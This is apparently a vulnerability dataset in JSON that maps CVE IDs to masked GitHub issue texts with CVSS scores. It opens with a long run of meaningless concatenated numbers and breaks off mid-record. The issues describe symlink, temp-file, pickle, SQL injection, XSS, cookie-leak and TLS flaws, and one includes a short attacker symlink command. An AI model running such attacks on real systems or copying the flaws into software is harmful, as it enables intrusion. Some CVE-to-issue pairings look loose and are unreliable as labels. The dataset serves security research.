18228182381824818258182681827818288182981830818318183281833818348183581836818378183881839818408184181842818438184481845818468184781848818498185081851818528185381854818558185681857818588185981860818618186281863818648186581866818678186881869818708187181872818738187481875818768187781878818798188081881818828188381884818858188681887818888188981890818918189281893818948189581896818978189881899819008190181902819038190481905819068190781908819098191081911819128191381914819158191681917819188191981920819218192281923819248192581926819278192881929819308193181932819338193481935819368193781938819398194081941819428194381944819458194681947819488194981950819518195281953819548195581956819578195881959819608196181962819638196481965819668196781968819698197081971819728197381974819758197681977819788197981980819818198281983819848198581986819878198881989819908199181992819938199481995819968199781998819998200082001820028200382004820058200682007820088200982010820118201282013820148201582016820178201882019820208202182022820238202482025820268202782028820298203082031820328203382034820358203682037820388203982040820418204282043820448204582046820478204882049820508205182052820538205482055820568205782058820598206082061820628206382064820658206682067820688206982070820718207282073820748207582076820778207882079820808208182082820838208482085820868208782088820898209082091820928209382094820958209682097820988209982100821018210282103821048210582106821078210882109821108211182112821138211482115821168211782118821198212082121821228212382124821258212682127821288212982130821318213282133821348213582136821378213882139821408214182142821438214482145821468214782148821498215082151821528215382154821558215682157821588215982160821618216282163821648216582166821678216882169821708217182172821738217482175821768217782178821798218082181821828218382184821858218682187821888218982190821918219282193821948219582196821978219882199822008220182202822038220482205822068220782208822098221082211822128221382214822158221682217822188221982220822218
22228222382224822258222682227822288222982230822318223282233822348223582236822378223882239822408224182242822438224482245822468224782248822498225082251822528225382254822558225682257822588225982260822618226282263822648226582266822678226882269822708227182272822738227482275822768227782278822798228082281822828228382284822858228682287822888228982290822918229282293822948229582296822978229882299823008230182302823038230482305823068230782308823098231082311823128231382314823158231682317823188231982320823218232282323823248232582326823278232882329823308233182332823338233482335823368233782338823398234082341823428234382344823458234682347823488234982350823518235282353823548235582356823578235882359823608236182362823638236482365823668236782368823698237082371823728237382374823758237682377823788237982380823818238282383823848238582386823878238882389823908239182392823938239482395823968239782398823998240082401824028240382404824058240682407824088240982410824118241282413824148241582416824178241882419824208242182422824238242482425824268242782428824298243082431824328243382434824358243682437824388243982440824418244282443824448244582446824478244882449824508245182452824538245482455824568245782458824598246082461824628246382464824658246682467824688246982470824718247282473824748247582476824778247882479824808248182482824838248482485824868248782488824898249082491824928249382494824958249682497824988249982500825018250282503825048250582506825078250882509825108251182512825138251482515825168251782518825198252082521825228252382524825258252682527825288252982530825318253282533825348253582536825378253882539825408254182542825438254482545825468254782548825498255082551825528255382554825558255682557825588255982560825618256282563825648256582566825678256882569825708257182572825738257482575825768257782578825798258082581825828258382584825858258682587825888258982590825918259282593825948259582596825978259882599826008260182602826038260482605826068260782608826098261082611826128261382614826158261682617826188261982620826218
26228262382624826258262682627826288262982630826318263282633826348263582636826378263882639826408264182642826438264482645826468264782648826498265082651826528265382654826558265682657826588265982660826618266282663826648266582666826678266882669826708267182672826738267482675826768267782678826798268082681826828268382684826858268682687826888268982690826918269282693826948269582696826978269882699827008270182702827038270482705827068270782708827098271082711827128271382714827158271682717827188271982720827218272282723827248272582726827278272882729827308273182732827338273482735827368273782738827398274082741827428274382744827458274682747827488274982750827518275282753827548275582756827578275882759827608276182762827638276482765827668276782768827698277082771827728277382774827758277682777827788277982780827818278282783827848278582786827878278882789827908279182792827938279482795827968279782798827998280082801828028280382804828058280682807828088280982810828118281282813828148281582816828178281882819828208282182822828238282482825828268282782828828298283082831828328283382834828358283682837828388283982840828418284282843828448284582846828478284882849828508285182852828538285482855828568285782858828598286082861828628286382864828658286682867828688286982870828718287282873828748287582876828778287882879828808288182882828838288482885828868288782888828898289082891828928289382894828958289682897828988289982900829018290282903829048290582906829078290882909829108291182912829138291482915829168291782918829198292082921829228292382924829258292682927829288292982930829318293282933829348293582936829378293882939829408294182942829438294482945829468294782948829498295082951829528295382954829558295682957829588295982960829618296282963829648296582966829678296882969829708297182972829738297482975829768297782978829798298082981829828298382984829858298682987829888298982990829918299282993829948299582996829978299882999830008300183002830038300483005830068300783008830098301083011830128301383014830158301683017830188301983020830218
30228302383024830258302683027830288302983030830318303283033830348303583036830378303883039830408304183042830438304483045830468304783048830498305083051830528305383054830558305683057830588305983060830618306283063830648306583066830678306883069830708307183072830738307483075830768307783078830798308083081830828308383084830858308683087830888308983090830918309283093830948309583096830978309883099831008310183102831038310483105831068310783108831098311083111831128311383114831158311683117831188311983120831218312283123831248312583126831278312883129831308313183132831338313483135831368313783138831398314083141831428314383144831458314683147831488314983150831518315283153831548315583156831578315883159831608316183162831638316483165831668316783168831698317083171831728317383174831758317683177831788317983180831818318283183831848318583186831878318883189831908319183192831938319483195831968319783198831998320083201832028320383204832058320683207832088320983210832118321283213832148321583216832178321883219832208322183222832238322483225832268322783228832298323083231832328323383234832358323683237832388323983240832418324283243832448324583246832478324883249832508325183252832538325483255832568325783258832598326083261832628326383264832658326683267832688326983270832718327283273832748327583276832778327883279832808328183282832838328483285832868328783288832898329083291832928329383294832958329683297832988329983300833018330283303833048330583306833078330883309833108331183312833138331483315833168331783318833198332083321833228332383324833258332683327833288332983330833318333283333833348333583336833378333883339833408334183342833438334483345833468334783348833498335083351833528335383354833558335683357833588335983360833618336283363833648336583366833678336883369833708337183372833738337483375833768337783378833798338083381833828338383384833858338683387833888338983390833918339283393833948339583396833978339883399834008340183402834038340483405834068340783408834098341083411834128341383414834158341683417834188341983420834218
34228342383424834258342683427834288342983430834318343283433834348343583436834378343883439834408344183442834438344483445834468344783448834498345083451834528345383454834558345683457834588345983460834618346283463834648346583466834678346883469834708347183472834738347483475834768347783478834798348083481834828348383484834858348683487834888348983490834918349283493834948349583496834978349883499835008350183502835038350483505835068350783508835098351083511835128351383514835158351683517835188351983520835218352283523835248352583526835278352883529835308353183532835338353483535835368353783538835398354083541835428354383544835458354683547835488354983550835518355283553835548355583556835578355883559835608356183562835638356483565835668356783568835698357083571835728357383574835758357683577835788357983580835818358283583835848358583586835878358883589835908359183592835938359483595835968359783598835998360083601836028360383604836058360683607836088360983610836118361283613836148361583616836178361883619836208362183622836238362483625836268362783628836298363083631836328363383634836358363683637836388363983640836418364283643836448364583646836478364883649836508365183652836538365483655836568365783658836598366083661836628366383664836658366683667836688366983670836718367283673836748367583676836778367883679836808368183682836838368483685836868368783688836898369083691836928369383694836958369683697836988369983700837018370283703837048370583706837078370883709837108371183712837138371483715837168371783718837198372083721837228372383724837258372683727837288372983730837318373283733837348373583736837378373883739837408374183742837438374483745837468374783748837498375083751837528375383754837558375683757837588375983760837618376283763837648376583766837678376883769837708377183772837738377483775837768377783778837798378083781837828378383784837858378683787837888378983790837918379283793837948379583796837978379883799838008380183802838038380483805838068380783808838098381083811838128381383814838158381683817838188381983820838218
38228382383824838258382683827838288382983830838318383283833838348383583836838378383883839838408384183842838438384483845838468384783848838498385083851838528385383854838558385683857838588385983860838618386283863838648386583866838678386883869838708387183872838738387483875838768387783878838798388083881838828388383884838858388683887838888388983890838918389283893838948389583896838978389883899839008390183902839038390483905839068390783908839098391083911839128391383914839158391683917839188391983920839218392283923839248392583926839278392883929839308393183932839338393483935839368393783938839398394083941839428394383944839458394683947839488394983950839518395283953839548395583956839578395883959839608396183962839638396483965839668396783968839698397083971839728397383974839758397683977839788397983980839818398283983839848398583986839878398883989839908399183992839938399483995839968399783998839998400084001840028400384004840058400684007840088400984010840118401284013840148401584016840178401884019840208402184022840238402484025840268402784028840298403084031840328403384034840358403684037840388403984040840418404284043840448404584046840478404884049840508405184052840538405484055840568405784058840598406084061840628406384064840658406684067840688406984070840718407284073840748407584076840778407884079840808408184082840838408484085840868408784088840898409084091840928409384094840958409684097840988409984100841018410284103841048410584106841078410884109841108411184112841138411484115841168411784118841198412084121841228412384124841258412684127841288412984130841318413284133841348413584136841378413884139841408414184142841438414484145841468414784148841498415084151841528415384154841558415684157841588415984160841618416284163841648416584166841678416884169841708417184172841738417484175841768417784178841798418084181841828418384184841858418684187841888418984190841918419284193841948419584196841978419884199842008420184202842038420484205842068420784208842098421084211842128421384214842158421684217842188421984220842218
42228422384224842258422684227842288422984230842318423284233842348423584236842378423884239842408424184242842438424484245842468424784248842498425084251842528425384254842558425684257842588425984260842618426284263842648426584266842678426884269842708427184272842738427484275842768427784278842798428084281842828428384284842858428684287842888428984290842918429284293842948429584296842978429884299843008430184302843038430484305843068430784308843098431084311843128431384314843158431684317843188431984320843218432284323843248432584326843278432884329843308433184332843338433484335843368433784338843398434084341843428434384344843458434684347843488434984350843518435284353843548435584356843578435884359843608436184362843638436484365843668436784368843698437084371843728437384374843758437684377843788437984380843818438284383843848438584386843878438884389843908439184392843938439484395843968439784398843998440084401844028440384404844058440684407844088440984410844118441284413844148441584416844178441884419844208442184422844238442484425844268442784428844298443084431844328443384434844358443684437844388443984440844418444284443844448444584446844478444884449844508445184452844538445484455844568445784458844598446084461844628446384464844658446684467844688446984470844718447284473844748447584476844778447884479844808448184482844838448484485844868448784488844898449084491844928449384494844958449684497844988449984500845018450284503845048450584506845078450884509845108451184512845138451484515845168451784518845198452084521845228452384524845258452684527845288452984530845318453284533845348453584536845378453884539845408454184542845438454484545845468454784548845498455084551845528455384554845558455684557845588455984560845618456284563845648456584566845678456884569845708457184572845738457484575845768457784578845798458084581845828458384584845858458684587845888458984590845918459284593845948459584596845978459884599846008460184602846038460484605846068460784608846098461084611846128461384614846158461684617846188461984620846218
46228462384624846258462684627846288462984630846318463284633846348463584636846378463884639846408464184642846438464484645846468464784648846498465084651846528465384654846558465684657846588465984660846618466284663846648466584666846678466884669846708467184672846738467484675846768467784678846798468084681846828468384684846858468684687846888468984690846918469284693846948469584696846978469884699847008470184702847038470484705847068470784708847098471084711847128471384714847158471684717847188471984720847218472284723847248472584726847278472884729847308473184732847338473484735847368473784738847398474084741847428474384744847458474684747847488474984750847518475284753847548475584756847578475884759847608476184762847638476484765847668476784768847698477084771847728477384774847758477684777847788477984780847818478284783847848478584786847878478884789847908479184792847938479484795847968479784798847998480084801848028480384804848058480684807848088480984810848118481284813848148481584816848178481884819848208482184822848238482484825848268482784828848298483084831848328483384834848358483684837848388483984840848418484284843848448484584846848478484884849848508485184852848538485484855848568485784858848598486084861848628486384864848658486684867848688486984870848718487284873848748487584876848778487884879848808488184882848838488484885848868488784888848898489084891848928489384894848958489684897848988489984900849018490284903849048490584906849078490884909849108491184912849138491484915849168491784918849198492084921849228492384924849258492684927849288492984930849318493284933849348493584936849378493884939849408494184942849438494484945849468494784948849498495084951849528495384954849558495684957849588495984960849618496284963849648496584966849678496884969849708497184972849738497484975849768497784978849798498084981849828498384984849858498684987849888498984990849918499284993849948499584996849978499884999850008500185002850038500485005850068500785008850098501085011850128501385014850158501685017850188501985020850218
  1. [
  2. {
  3. "CVE_ID": "CVE-2011-4116",
  4. "Issue_Url_old": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14",
  5. "Issue_Url_new": "https://github.com/perl-toolchain-gang/file-temp/issues/14",
  6. "Repo_new": "perl-toolchain-gang/file-temp",
  7. "Issue_Created_At": "2016-04-03T03:41:22Z",
  8. "description": "APITAG allows unsafe traversal of symlinks APITAG NUMBERTAG URLTAG Example... As user \"attacker\": ln s /tmp /tmp/exploit As user \"victim\": perl APITAG e APITAG APITAG print APITAG PATHTAG ) . \" \";' The temporary directory path that is returned includes the symlink owned by the \"attacker\" user.",
  9. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  10. "severity": "HIGH",
  11. "baseScore": 7.5,
  12. "impactScore": 3.6,
  13. "exploitabilityScore": 3.9
  14. },
  15. {
  16. "CVE_ID": "CVE-2013-4891",
  17. "Issue_Url_old": "https://github.com/bcit-ci/CodeIgniter/issues/4020",
  18. "Issue_Url_new": "https://github.com/bcit-ci/codeigniter/issues/4020",
  19. "Repo_new": "bcit-ci/codeigniter",
  20. "Issue_Created_At": "2015-08-04T08:48:37Z",
  21. "description": "APITAG security and CVE database. Hello APITAG developers, I noticed a few known security vulnerabilities (CVE numbers) that apply to the APITAG project (official CPE name APITAG For APITAG are four registered CVE reports: CVETAG CVETAG CVETAG CVETAG For APITAG is just one known security report: CVETAG . Source: FILETAG I read some CVE related posts and I noticed that the value of a CVE database is not always appreciated or understood. Source: URLTAG URLTAG Nevertheless I'm wondering why there are not more CVE's reported so far. I've been pretty active in following the APITAG development and noticed last years that some security bugs have been fixed but are never reported to the CVE database. I'm happy that APITAG is an open source project and like to contribute to that. Especially using some of my IT security expertise. For that reason I'd like to work out some CVE reports about different security bugs in previous versions that are currently fixed. This way there will be a clear and open view about the amount of security vulnerabilities per version and hopefully this will encourage the developers who didn't upgrade, to upgrade to the latest version of APITAG For people who are unfamiliar to this world. In comparison and as an example this are the CVE lists of some other PHP frameworks and APITAG Yii: FILETAG Zend: FILETAG Symfony: FILETAG APITAG FILETAG I'd like to hear some thoughts about this and especially I'm wondering if I should just work out some APITAG and just submit the bugs to the CVE database, or to discuss those bugs here before submitting them, just to make sure. Any thoughts? Greetings!",
  22. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23. "severity": "MEDIUM",
  24. "baseScore": 6.1,
  25. "impactScore": 2.7,
  26. "exploitabilityScore": 2.8
  27. },
  28. {
  29. "CVE_ID": "CVE-2013-7447",
  30. "Issue_Url_old": "https://github.com/mate-desktop/eom/issues/93",
  31. "Issue_Url_new": "https://github.com/mate-desktop/eom/issues/93",
  32. "Repo_new": "mate-desktop/eom",
  33. "Issue_Created_At": "2015-07-26T22:46:13Z",
  34. "description": "EOM crashes when trying to open a large PNG file. Hello, I would like to report a bug concerning EOM version NUMBERTAG When trying to open a large PNG file NUMBERTAG p NUMBERTAG px) EOM crashes. Environment: Debian NUMBERTAG EOM NUMBERTAG I've been able to catch a backtrace using gdb: APITAG received signal SIGSEGV, Segmentation fault. APITAG to Thread NUMBERTAG fd NUMBERTAG LWP NUMBERTAG fd NUMBERTAG fc NUMBERTAG f0 in APITAG () from PATHTAG (gdb) bt NUMBERTAG fd NUMBERTAG fc NUMBERTAG f0 in APITAG () from PATHTAG NUMBERTAG in eom_thumbnail_load NUMBERTAG in NUMBERTAG b1 in NUMBERTAG fd NUMBERTAG ca NUMBERTAG in g_thread_proxy (data NUMBERTAG bf NUMBERTAG at PATHTAG NUMBERTAG fd NUMBERTAG b NUMBERTAG a0a4 in start_thread (arg NUMBERTAG fd NUMBERTAG at APITAG NUMBERTAG fd NUMBERTAG b3cf NUMBERTAG d in clone () at PATHTAG Please let me know if you need the test file. Best regards",
  35. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36. "severity": "MEDIUM",
  37. "baseScore": 6.5,
  38. "impactScore": 3.6,
  39. "exploitabilityScore": 2.8
  40. },
  41. {
  42. "CVE_ID": "CVE-2013-7458",
  43. "Issue_Url_old": "https://github.com/antirez/redis/issues/3284",
  44. "Issue_Url_new": "https://github.com/redis/redis/issues/3284",
  45. "Repo_new": "redis/redis",
  46. "Issue_Created_At": "2016-05-30T15:35:38Z",
  47. "description": "redis cli: permissions when opening history file. redis cli saves it's history here: URLTAG and uses the linenoise library to fopen the file there: URLTAG If the file does not exist, it's created with default umask NUMBERTAG so the file ends up with NUMBERTAG redis cli writes it's history to APITAG by default, which usually expands to a folder in /home, which is world accessible by default in a lot of distributions. This causes the file to be world readable. You could either call umask to change the default permissions or pass appropriate permissions when creating, like bash does: APITAG URLTAG",
  48. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  49. "severity": "LOW",
  50. "baseScore": 3.3,
  51. "impactScore": 1.4,
  52. "exploitabilityScore": 1.8
  53. },
  54. {
  55. "CVE_ID": "CVE-2013-7458",
  56. "Issue_Url_old": "https://github.com/antirez/linenoise/issues/121",
  57. "Issue_Url_new": "https://github.com/antirez/linenoise/issues/121",
  58. "Repo_new": "antirez/linenoise",
  59. "Issue_Created_At": "2016-06-18T01:24:57Z",
  60. "description": "Function to save history as private file by default. Add a function that guarantees no group nor world access when creating a new history file, but do not change the current file permission.",
  61. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  62. "severity": "LOW",
  63. "baseScore": 3.3,
  64. "impactScore": 1.4,
  65. "exploitabilityScore": 1.8
  66. },
  67. {
  68. "CVE_ID": "CVE-2013-7459",
  69. "Issue_Url_old": "https://github.com/dlitz/pycrypto/issues/176",
  70. "Issue_Url_new": "https://github.com/pycrypto/pycrypto/issues/176",
  71. "Repo_new": "pycrypto/pycrypto",
  72. "Issue_Created_At": "2015-12-14T23:33:48Z",
  73. "description": "AES.new with invalid parameter crashes python. In Crypto NUMBERTAG and Python NUMBERTAG and NUMBERTAG folowing code causes crash: from APITAG import AES APITAG NUMBERTAG APITAG b NUMBERTAG",
  74. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75. "severity": "CRITICAL",
  76. "baseScore": 9.8,
  77. "impactScore": 5.9,
  78. "exploitabilityScore": 3.9
  79. },
  80. {
  81. "CVE_ID": "CVE-2013-7489",
  82. "Issue_Url_old": "https://github.com/bbangert/beaker/issues/191",
  83. "Issue_Url_new": "https://github.com/bbangert/beaker/issues/191",
  84. "Repo_new": "bbangert/beaker",
  85. "Issue_Created_At": "2020-05-14T18:02:40Z",
  86. "description": "Insecure data serialization method by default with pickle on Cache. Hello, Beaker uses Pickle on Session and Cache. On Session at least it has support to secret/HMAC but on caching it doesn't which can lead to arbitrary code execution. URLTAG Maybe it would be wise to expose data_serializer in Cache too and maybe even allow a secret definition for caching. What do you think?",
  87. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  88. "severity": "MEDIUM",
  89. "baseScore": 6.8,
  90. "impactScore": 5.9,
  91. "exploitabilityScore": 0.9
  92. },
  93. {
  94. "CVE_ID": "CVE-2014-0087",
  95. "Issue_Url_old": "https://github.com/ManageIQ/manageiq/issues/1581",
  96. "Issue_Url_new": "https://github.com/manageiq/manageiq/issues/1581",
  97. "Repo_new": "manageiq/manageiq",
  98. "Issue_Created_At": "2015-02-05T08:32:09Z",
  99. "description": "Hardening of the RBAC check. The current code in APITAG that does RBAC checking is: CODETAG Meaning that if we do not find particular RBAC feature, we just validate the existence of a route and let the request in. The routes are whitelisted in the route file and effort was put into making sure that we have all the features defined. Right now I don't see an exploit for this as there would have to be extra route for this to an action what does not have RBAC feature and check defined. However for a developer it's easy to forget and expose something this way. Therefor we shoud we should change the code to: CODETAG and fix or change whatever is needed to be done to make everything work as before from the user perspective.",
  100. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  101. "severity": "HIGH",
  102. "baseScore": 8.8,
  103. "impactScore": 5.9,
  104. "exploitabilityScore": 2.8
  105. },
  106. {
  107. "CVE_ID": "CVE-2014-5002",
  108. "Issue_Url_old": "https://github.com/panthomakos/lynx/issues/3",
  109. "Issue_Url_new": "https://github.com/panthomakos/lynx/issues/3",
  110. "Repo_new": "panthomakos/lynx",
  111. "Issue_Created_At": "2018-01-12T00:12:50Z",
  112. "description": "CVE: APITAG password exposed on the command line. CVETAG",
  113. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  114. "severity": "HIGH",
  115. "baseScore": 7.8,
  116. "impactScore": 5.9,
  117. "exploitabilityScore": 1.8
  118. },
  119. {
  120. "CVE_ID": "CVE-2014-7919",
  121. "Issue_Url_old": "https://github.com/alexpark07/Bookmark/issues/1",
  122. "Issue_Url_new": "https://github.com/alexpark07/bookmark/issues/1",
  123. "Repo_new": "alexpark07/bookmark",
  124. "Issue_Created_At": "2016-07-12T17:28:56Z",
  125. "description": "can you match up one of your disclosures?. FILETAG CVETAG can you match this to a commit or Android Bug ID? Thanks!",
  126. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  127. "severity": "HIGH",
  128. "baseScore": 7.5,
  129. "impactScore": 3.6,
  130. "exploitabilityScore": 3.9
  131. },
  132. {
  133. "CVE_ID": "CVE-2014-8184",
  134. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/425",
  135. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/425",
  136. "Repo_new": "liblouis/liblouis",
  137. "Issue_Created_At": "2017-10-16T12:12:12Z",
  138. "description": "stack based buffer overflow ( CVETAG ). Hello, Do you have any commit for this issue? References: CVETAG CVETAG Thanks in advance!",
  139. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  140. "severity": "HIGH",
  141. "baseScore": 7.8,
  142. "impactScore": 5.9,
  143. "exploitabilityScore": 1.8
  144. },
  145. {
  146. "CVE_ID": "CVE-2014-9515",
  147. "Issue_Url_old": "https://github.com/DozerMapper/dozer/issues/410",
  148. "Issue_Url_new": "https://github.com/dozermapper/dozer/issues/410",
  149. "Repo_new": "dozermapper/dozer",
  150. "Issue_Created_At": "2017-05-29T20:08:26Z",
  151. "description": "Update references of package names to APITAG As we are releasing under the APITAG group id, the packages should also match.",
  152. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  153. "severity": "CRITICAL",
  154. "baseScore": 9.8,
  155. "impactScore": 5.9,
  156. "exploitabilityScore": 3.9
  157. },
  158. {
  159. "CVE_ID": "CVE-2014-9515",
  160. "Issue_Url_old": "https://github.com/DozerMapper/dozer/issues/786",
  161. "Issue_Url_new": "https://github.com/dozermapper/dozer/issues/786",
  162. "Repo_new": "dozermapper/dozer",
  163. "Issue_Created_At": "2020-02-12T12:49:23Z",
  164. "description": "No indication if CVETAG is solved. Dozer NUMBERTAG has vulnerability CVETAG . I couldn't find any information about it in Dozer NUMBERTAG release notes and migration documents. It is either not fixed yet or the information is missing.",
  165. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  166. "severity": "CRITICAL",
  167. "baseScore": 9.8,
  168. "impactScore": 5.9,
  169. "exploitabilityScore": 3.9
  170. },
  171. {
  172. "CVE_ID": "CVE-2014-9748",
  173. "Issue_Url_old": "https://github.com/libuv/libuv/issues/515",
  174. "Issue_Url_new": "https://github.com/libuv/libuv/issues/515",
  175. "Repo_new": "libuv/libuv",
  176. "Issue_Created_At": "2015-09-07T13:02:14Z",
  177. "description": "windows: xp rwlock fallback is unsound. It was pointed out by Zhou Ran that the fallback write mutex can end up getting unlocked by a different thread than the one that locked it, resulting in undefined behavior. Consider a rwlock that is initially unlocked: Thread A: increments reader count at t0 > acquires write lock at t0 > decrements reader count at t2 Thread B: increments reader count at t1 > decrements reader count at t3 > releases write lock at t3 See also URLTAG",
  178. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  179. "severity": "HIGH",
  180. "baseScore": 8.1,
  181. "impactScore": 5.9,
  182. "exploitabilityScore": 2.2
  183. },
  184. {
  185. "CVE_ID": "CVE-2015-1378",
  186. "Issue_Url_old": "https://github.com/grml/grml-debootstrap/issues/59",
  187. "Issue_Url_new": "https://github.com/grml/grml-debootstrap/issues/59",
  188. "Repo_new": "grml/grml-debootstrap",
  189. "Issue_Created_At": "2015-01-20T15:49:50Z",
  190. "description": "Git HEAD: . The current code is sourcing APITAG from the directory that grml debootstrap is executed from: ERRORTAG To demonstrate it: APITAG Before sourcing that file, grml debootstrap should check if the current working directory is writable to non root users and deny sourcing if so.",
  191. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  192. "severity": "HIGH",
  193. "baseScore": 7.5,
  194. "impactScore": 3.6,
  195. "exploitabilityScore": 3.9
  196. },
  197. {
  198. "CVE_ID": "CVE-2015-1590",
  199. "Issue_Url_old": "https://github.com/kamailio/kamailio/issues/48",
  200. "Issue_Url_new": "https://github.com/kamailio/kamailio/issues/48",
  201. "Repo_new": "kamailio/kamailio",
  202. "Issue_Created_At": "2015-01-20T09:46:30Z",
  203. "description": "multiple /tmp file vulnerabilities. Reported by: Helmut Grohne APITAG The kamailio package now installs PATHTAG which can be selected via the CFGFILE= setting in PATHTAG The configuration contains: APITAG This setting is insecure and may allow local users to elevate privileges to the kamailio user. The issue extends to kamailio APITAG It seems that this is due to an incomplete fix of NUMBERTAG Looking further, the state of /tmp file vulnerabilities in kamailio looks worrisome. Most of the results of the following command (to be executed in the kamailio source) are likely vulnerable if executed: APITAG Granted, some of the results are examples, documentation or obsolete. But quite a few reach the default settings: kamcmd defaults to connecting to PATHTAG The kamailio build definitely is vulnerable as can be seen in PATHTAG More research clearly is required here. Given these findings, the security team may want to veto the inclusion of kamailio in a stable release, which would be very unfortunate as kamailio is quite a unique piece of software with little competitors in its field. Helmut CVETAG",
  204. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  205. "severity": "HIGH",
  206. "baseScore": 7.8,
  207. "impactScore": 5.9,
  208. "exploitabilityScore": 1.8
  209. },
  210. {
  211. "CVE_ID": "CVE-2015-1820",
  212. "Issue_Url_old": "https://github.com/rest-client/rest-client/issues/369",
  213. "Issue_Url_new": "https://github.com/rest-client/rest-client/issues/369",
  214. "Repo_new": "rest-client/rest-client",
  215. "Issue_Created_At": "2015-03-24T02:47:54Z",
  216. "description": "CVETAG : rest client passes values from Set Cookie headers to arbitrary redirection target. When Ruby rest client NUMBERTAG processes an HTTP redirection response, it blindly passes along the values from any Set Cookie headers to the redirection target, regardless of domain, path, or expiration. This is very similar to CVETAG , which affected python requests. URLTAG The issue could be similarly exploited in the following ways: If you are the redirection source (i.e. you can make rest client hit your URL), you can make rest client perform a request to any third party domain with cookies of your choosing. This may be useful in performing a session fixation attack. If you are the redirection target (i.e. you can make a third party site redirect to your URL), you can steal any cookies set by the third party redirection. The behavior was introduced in rest client NUMBERTAG by this commit: URLTAG All subsequently released NUMBERTAG and NUMBERTAG ersions are affected. This issue is expected to be fixed in a forthcoming rest client NUMBERTAG release.",
  217. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  218. "severity": "CRITICAL",
  219. "baseScore": 9.8,
  220. "impactScore": 5.9,
  221. "exploitabilityScore": 3.9
  222. },
  223. {
  224. "CVE_ID": "CVE-2015-1828",
  225. "Issue_Url_old": "https://github.com/ruby/openssl/issues/8",
  226. "Issue_Url_new": "https://github.com/ruby/openssl/issues/8",
  227. "Repo_new": "ruby/openssl",
  228. "Issue_Created_At": "2015-03-24T22:27:01Z",
  229. "description": "Subject is not ensured to be verified even when APITAG is configured. Even if APITAG is configured, I/O is allowed with a remote server before the subject has been verified. VERIFY_PEER only checks the cert chain is rooted in the local truststore. It does not check if the subject is valid in and of itself. My understanding is the APITAG method must be called to ensure the subject is correctly verified. However, communication is allowed to remote services without verifying the subject. I would suggest throwing an exception if VERIFY_PEER is configured and I/O is attempted without first calling APITAG It would also be nice if this all happened automatically simply by passing hostname into APITAG (which AFAICT only affects SNI presently, and not subject verification)",
  230. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  231. "severity": "MEDIUM",
  232. "baseScore": 5.9,
  233. "impactScore": 3.6,
  234. "exploitabilityScore": 2.2
  235. },
  236. {
  237. "CVE_ID": "CVE-2015-20001",
  238. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/25842",
  239. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/25842",
  240. "Repo_new": "rust-lang/rust",
  241. "Issue_Created_At": "2015-05-27T22:07:40Z",
  242. "description": "APITAG is not exception safe. APITAG is using APITAG and may not be exception safe. I.e. it is in an inconsistent state after being recovered after panic. See issue NUMBERTAG and others. Relevant code is APITAG sift_down_range URLTAG cc MENTIONTAG",
  243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  244. "severity": "HIGH",
  245. "baseScore": 7.5,
  246. "impactScore": 3.6,
  247. "exploitabilityScore": 3.9
  248. },
  249. {
  250. "CVE_ID": "CVE-2015-2142",
  251. "Issue_Url_old": "https://github.com/a-v-k/phpBugTracker/issues/4",
  252. "Issue_Url_new": "https://github.com/a-v-k/phpbugtracker/issues/4",
  253. "Repo_new": "a-v-k/phpbugtracker",
  254. "Issue_Created_At": "2015-02-05T16:29:35Z",
  255. "description": "Multiple SQL injection , reflecting/stored XSS and CSRF vulnerabilities in APITAG NUMBERTAG Dear development team. I found multiple SQL injection , reflecting/stored XSS and CSRF vulnerabilities in your product APITAG NUMBERTAG Please provide me an email address where I can send the technical details to. Otherwise, if you don't mind, I can post them directly on Github. I have released a security advisory without technical details here: URLTAG If you don't respond until NUMBERTAG th February NUMBERTAG UTC NUMBERTAG I will as well release the technical details of these issues and send the vulnerabilities to the security mailing list APITAG to warn people. Thank you for your attention. Greetings from Germany. Steffen R\u00f6semann",
  256. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  257. "severity": "HIGH",
  258. "baseScore": 8.0,
  259. "impactScore": 5.9,
  260. "exploitabilityScore": 2.1
  261. },
  262. {
  263. "CVE_ID": "CVE-2015-2674",
  264. "Issue_Url_old": "https://github.com/benoitc/restkit/issues/140",
  265. "Issue_Url_new": "https://github.com/benoitc/restkit/issues/140",
  266. "Repo_new": "benoitc/restkit",
  267. "Issue_Created_At": "2015-03-12T14:34:18Z",
  268. "description": "Doesn't Validate TLS. Restkit does not validate TLS which means it's HTTPS handling is broken and insecure. ERRORTAG",
